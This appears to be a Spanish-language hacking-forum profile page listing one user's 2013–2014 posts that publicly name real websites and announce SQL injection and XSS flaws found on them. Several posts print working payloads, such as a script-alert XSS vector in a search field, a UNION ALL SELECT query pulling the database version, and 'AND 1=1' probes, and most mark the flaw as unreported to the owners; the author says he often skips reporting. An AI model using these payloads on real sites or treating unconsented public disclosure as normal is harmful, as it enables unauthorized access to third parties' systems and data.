Muy detallada la info
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Hacking ShowOff / [XSS] financialhearings.com
Mayo 09, 2014, 03:35:49 AM- URL No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Path afectado: Buscador
- Reportado: NOP
- Vector: <script>alert("Pekeinfo");</script> AND [Datum]>11/09/2013 AND [Datum]<11/09/2013&SearchOrder=Newest first (by date)&SearchMax=All&Count=25&SearchWV=FALSE&SearchFuzzy=FALSE
- Url completa: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#3
Underc0de / Re:Reto Oficial #2 - El rey de la Colina - Anotate!
Octubre 02, 2013, 04:57:25 PM
go pues me apunto
#4
Hacking ShowOff / Re:[Xss] http://adepi.net
Octubre 02, 2013, 12:01:24 PM
fue muy ajustado pero creo que la publique antes
#5
Hacking ShowOff / [Xss] http://adepi.net
Octubre 02, 2013, 11:57:37 AM
XSS
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: pekeinfo
Reportado: SI (twitter)
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: pekeinfo
Reportado: SI (twitter)
#6
Hacking ShowOff / Re:{XSS} http://canasemillas.com
Octubre 01, 2013, 05:18:47 PM
no voy a preguntar que hacías buscando eso
#7
Hacking ShowOff / Re:[SQLI] http://www.raspipc.es
Octubre 01, 2013, 03:39:04 PM
Hable con el propietario de la web.
Por lo que me comento en el correo el fallo a sido solucionado
Por lo que me comento en el correo el fallo a sido solucionado
#8
Hacking ShowOff / [SQLI] http://www.raspipc.es
Octubre 01, 2013, 10:21:35 AM
SQLi
- Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Inyeccion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta#
- Autor: pekeinfo
- Reportado: SI
#9
Hacking ShowOff / [SQLI ] www.domusartium2002.com
Septiembre 26, 2013, 10:17:27 AM
SQLi
- Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Inyeccion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta#
- Autor: pekeinfo
- Reportado: SI
#10
Hacking ShowOff / [SQLI ] http://ajlopez.net
Septiembre 26, 2013, 06:15:57 AM
SQLi
No se como reportar la falla al administrador del sitio!
- Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
- Inyeccion: Id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT%28version%28%29%29,NULL,NULL,NULL,NULL,NULL,NULL#
- Autor: pekeinfo
- Reportado: NO
No se como reportar la falla al administrador del sitio!
#11
Hacking ShowOff / Re:[SQLi] http://www.saiwireless.com
Septiembre 23, 2013, 08:06:54 PM1) Se lo que es robots.txt, y creo que en este caso si esta mal usado puesto que robost existe para facilitar la función a los buscadores y crawlers, y tal y como lo están usando desde mi punto de vista generan una vulnerabilidad de fuga de información. puesto que no quita los directorios /js/*, /img/* ...etc en su lugar lo que esta haciendo es que un atacante descubra paginas que pueden ser posibles vectores.
2) si no he reportado el fallo es en gran medida a que no quiero , ¿por que? pues por que la mayoría de los sitios a los que les mando el correo se sienten amenazados o bien pasan de el fallo. Esto me llevo a la conclusión que me cuesta mas esfuerzo reportar el fallo y me trae mas problemas que simplemente no hacerlo. aun así en muchas paginas luego lo reporto dependiendo de a cuanta información se puede tener acceso!
3) creo que con el simple hecho de AND 1=1 queda demostrada la injection por lo que tampoco le di mucha importancia, y poner toda la injection me parece un poco mas peligroso para la integridad del sitio afectado puesto que cualquiera con malas intenciones y sin conocimiento puede generar injeciones mas peligrosas. aun así yo pongo la injection :
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si esto no es lo que hay que poner ruego me disculpen y me corrijan.
Gracias de antemano!
#12
Hacking ShowOff / [SQLi] http://www.saiwireless.com
Septiembre 23, 2013, 05:05:35 PM
SQLi
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
Bueno esto no se si se considera vulnerabilidad o no, yo si lo considero pero bueno ....
en el robots.txt tienen:
User-agent: *
Disallow: /memorias/
Disallow: /desarrollo/
Desarrollo:
creo que solo estara cuando ellos inserten algo :/
memorias:
es un wordpress sin actualizar segun su readme.txt es la Version 2.9.2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
Bueno esto no se si se considera vulnerabilidad o no, yo si lo considero pero bueno ....
en el robots.txt tienen:
User-agent: *
Disallow: /memorias/
Disallow: /desarrollo/
Desarrollo:
creo que solo estara cuando ellos inserten algo :/
memorias:
es un wordpress sin actualizar segun su readme.txt es la Version 2.9.2
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#13
Hacking ShowOff / [SQLi][Xss] http://www.futbolinesnacho.es
Septiembre 23, 2013, 04:58:51 PM
XSS
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: en el buscador <h1>underc0de</h1>
Autor: pekeinfo
Reportado: NO
SQLi
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: en el buscador <h1>underc0de</h1>
Autor: pekeinfo
Reportado: NO
SQLi
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
#14
Hacking ShowOff / [SQLi] http://electronica.ugr.es
Septiembre 23, 2013, 04:54:11 PM
SQLi
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta AND 1=1
Autor:pekeinfo
Reportado: NO
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta AND 1=1
Autor:pekeinfo
Reportado: NO
#15
Hacking ShowOff / Re:[SQLI ] http://redfarmaco.org
Septiembre 20, 2013, 12:49:28 PM
Ok gracias por la ayuda.
ahora mismo les mando un mail.
ahora mismo les mando un mail.
#16
Hacking ShowOff / [SQLI ] http://redfarmaco.org
Septiembre 20, 2013, 10:46:55 AM
SQLi
Inyeccion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: pekeinfo
Reportado: NO
No se como reportar la falla al administrador del sitio!
Inyeccion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Autor: pekeinfo
Reportado: NO
No se como reportar la falla al administrador del sitio!
#17
Hacking ShowOff / [SQLI ] http://www.fguv.org
Septiembre 20, 2013, 07:00:53 AMSQLi
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: AND 1=1
Autor:pekeinfo
Reportado: NO
#18
Hacking ShowOff / [SQLI ] http://www.culturadelparentesis.com
Septiembre 20, 2013, 06:34:16 AM
SQLi
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
#19
Hacking ShowOff / [SQLI ] http://www.travellysimons.com
Septiembre 20, 2013, 06:07:25 AM
SQLi
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: AND 1=1
Autor: pekeinfo
Reportado: NO
#20
Hacking ShowOff / [SQLI ] http://coocv.es
Septiembre 20, 2013, 05:18:13 AMSQLi
Url del sitio: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Inyeccion: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta AND 1=0
Autor: pekeinfo
Reportado: NO
Con motivo del aniversario de la primera sql injection